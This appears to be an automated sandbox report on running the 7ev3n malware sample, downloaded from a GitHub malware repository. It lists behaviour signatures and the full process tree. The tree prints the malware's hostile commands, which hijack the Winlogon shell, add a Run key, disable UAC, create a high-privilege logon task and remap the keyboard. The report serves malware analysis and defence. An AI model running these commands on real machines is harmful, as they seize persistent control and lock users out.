Analysis Overview
Threat Level: Known bad
The file https://github.com/Da2dalus/The-MALWARE-Repo was found to be: Known bad.
Malicious Activity Summary
Modifies WinLogon for persistence
UAC bypass
Downloads MZ/PE file
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
System Location Discovery: System Language Discovery
Browser Information Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks processor information in registry
Suspicious use of WriteProcessMemory
Modifies registry class
Enumerates system info in registry
Modifies data under HKEY_USERS
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-05-15 12:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-15 12:17
Reported
2025-05-15 12:18
Platform
win10v2004-20250502-en
Max time kernel
49s
Max time network
51s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\Downloads\7ev3n.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\7ev3n.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\system.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\system.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Browser Information Discovery
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\7ev3n.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\7ev3n.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\system.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\system.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133917850573289134" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-186956858-2143653872-2609589082-1000\{56EE996B-4B2C-4C1A-A76B-6DC8063771A6} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2d8,0x7ffd8017f208,0x7ffd8017f214,0x7ffd8017f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1900,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2296,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=2292 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2396,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=2428 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3532,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4240,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4296,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3504,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=3668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3672,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5328 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5096,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5300,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5924,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5924,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6068,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6104 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6264,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6284 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6348,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6172 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6184,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6212 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6604,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6616 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6776 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6936 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6924,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6804 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=704,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4484 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6080,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4304 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5292,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=120 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=6416,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7132,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6592,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4304 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6076,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:8
C:\Users\Admin\Downloads\7ev3n.exe
"C:\Users\Admin\Downloads\7ev3n.exe"
C:\Users\Admin\Downloads\7ev3n.exe
"C:\Users\Admin\Downloads\7ev3n.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
C:\Windows\SysWOW64\SCHTASKS.exe
C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
C:\Users\Admin\AppData\Local\system.exe
"C:\Users\Admin\AppData\Local\system.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
C:\Windows\SysWOW64\SCHTASKS.exe
